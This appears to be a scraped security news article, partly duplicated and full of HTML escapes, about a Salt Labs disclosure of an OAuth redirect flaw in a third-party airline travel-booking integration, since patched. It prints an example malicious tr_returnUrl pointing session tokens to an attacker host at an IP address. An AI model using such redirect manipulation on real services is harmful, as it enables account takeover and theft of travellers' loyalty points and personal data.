A vulnerability in a third-party travel service API has exposed millions of airline users to potential account takeovers, enabling attackers to exploit airline loyalty points and access sensitive personal information.\u00a0<\/p>\n
The flaw, discovered by Salt Labs, highlights the risks associated with API supply chain integrations and underscores the need for stronger security measures in third-party service ecosystems.<\/p>\n
The Vulnerability: Exploiting OAuth Redirects<\/strong><\/h2>\nThe affected travel service, anonymized as \u201cAcme Travel,\u201d provides hotel and car rental booking solutions integrated into numerous commercial airline platforms.\u00a0<\/p>\n
Are you from SOC\/DFIR Teams? \u2013\u00a0Analyse Malware Files & Links with ANY.RUN Sandox ->\u00a0Try for Free<\/a><\/strong><\/p>\nThis integration allows users to book accommodations using their airline loyalty points. However, researchers identified a critical flaw in the OAuth authentication<\/a> flow, specifically in the tr_returnUrl parameter.<\/p>\nIn a normal login process:<\/p>\n
\n- Users are redirected from the airline\u2019s website (e.g., www.saltairlines.sec) to Acme Travel\u2019s portal (e.g., acme.saltairlines.sec).<\/li>\n
- Acme Travel generates an OAuth link and redirects users back to the airline\u2019s site for authentication.<\/li>\n
- Upon successful login, a session token containing sensitive parameters (tr_code and tr_id) is sent back to Acme Travel.<\/li>\n<\/ul>\n
Attackers exploited this flow by manipulating the tr_returnUrl parameter to redirect these credentials to an attacker-controlled domain. For instance:<\/p>\n
\n- \nOriginal URL:<\/strong> https:\/\/acme.saltairlines.sec\/start?tr_returnUrl=https%3A%2F%2Facme.saltairlines.sec%2F<\/li>\n
- \nMalicious URL:<\/strong> https:\/\/acme.saltairlines.sec\/start?tr_returnUrl=http:\/\/142.93.164.25\/evil<\/li>\n<\/ul>\n
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjUN6Uu6IZBEjf1rlZB-3EryOycqYt0KGEwC1uWmbRsAfSN9T5Bs2P3vOkXSToV_s7Yzk4bfszgDRdE5zQ5W6fhs4HLUjPDiYuyFYO9AGfnAiqvsenFSkQxokz2ghx6_tKR4rVKqNkau0qYfN6J4JJcS51uw-075hfCYwTk5A_VmG6WKriHgFZgid0BDG1W\/s16000\/Screenshot%25202025-01-29%2520at%252011.33.57%25E2%2580%25AFAM%25201.webp?ssl=1\")
Attacker takes control of the system<\/figcaption><\/figure>\nOnce victims authenticated via the legitimate airline website<\/a>, their session tokens were transmitted to the attacker\u2019s server. These tokens allowed attackers to hijack accounts without further authentication.<\/p>\n\u201cWith this session token, the attacker can log into the system as the victim and perform actions on their behalf, including, of course, booking hotels and car rentals using nothing but the victim\u2019s airline loyalty points\u201d, researchers said<\/a>.<\/p>\nImpact of the Attack<\/strong><\/h2>\nThe implications of this vulnerability were severe:<\/p>\n
\n- \nAccount Takeover: <\/strong>Attackers could impersonate users, accessing personal information and loyalty point balances.<\/li>\n
- \nFraudulent Transactions:<\/strong> Unauthorized bookings for hotels and car rentals could be made using victims\u2019 loyalty points.<\/li>\n
- \nData Exposure: <\/strong>Personally identifiable information (PII) stored in user accounts was at risk.<\/li>\n<\/ul>\n
This attack was particularly insidious because it leveraged legitimate domains and manipulated only URL parameters, making detection via standard security measures like domain inspection or blocklists challenging.<\/p>\n
Further, the incident highlights the growing threat of API supply chain attacks, where vulnerabilities in third-party integrations can compromise entire ecosystems. APIs often serve as trust bridges between services but can become weak links if security is not rigorously enforced.<\/p>\n
Following coordinated disclosure by Salt Labs, the vulnerability has been patched. The travel service implemented stricter validation for redirect URLs to prevent unauthorized domains from receiving sensitive tokens.<\/p>\n
Integrating Application Security into Your CI\/CD Workflows Using Jenkins & Jira ->\u00a0Free Webinar<\/a><\/strong><\/strong><\/p>\nThe post API Supply Chain Attack Exposes Millions of Airline Users Accounts to Hackers<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n
This integration allows users to book accommodations using their airline loyalty points. However, researchers identified a critical flaw in the OAuth authentication<\/a> flow, specifically in the tr_returnUrl parameter.<\/p>\n In a normal login process:<\/p>\n Attackers exploited this flow by manipulating the tr_returnUrl parameter to redirect these credentials to an attacker-controlled domain. For instance:<\/p>\n Once victims authenticated via the legitimate airline website<\/a>, their session tokens were transmitted to the attacker\u2019s server. These tokens allowed attackers to hijack accounts without further authentication.<\/p>\n \u201cWith this session token, the attacker can log into the system as the victim and perform actions on their behalf, including, of course, booking hotels and car rentals using nothing but the victim\u2019s airline loyalty points\u201d, researchers said<\/a>.<\/p>\n The implications of this vulnerability were severe:<\/p>\n This attack was particularly insidious because it leveraged legitimate domains and manipulated only URL parameters, making detection via standard security measures like domain inspection or blocklists challenging.<\/p>\n Further, the incident highlights the growing threat of API supply chain attacks, where vulnerabilities in third-party integrations can compromise entire ecosystems. APIs often serve as trust bridges between services but can become weak links if security is not rigorously enforced.<\/p>\n Following coordinated disclosure by Salt Labs, the vulnerability has been patched. The travel service implemented stricter validation for redirect URLs to prevent unauthorized domains from receiving sensitive tokens.<\/p>\n Integrating Application Security into Your CI\/CD Workflows Using Jenkins & Jira ->\u00a0Free Webinar<\/a><\/strong><\/strong><\/p>\n The post API Supply Chain Attack Exposes Millions of Airline Users Accounts to Hackers<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n\n
\n
Impact of the Attack<\/strong><\/h2>\n
\n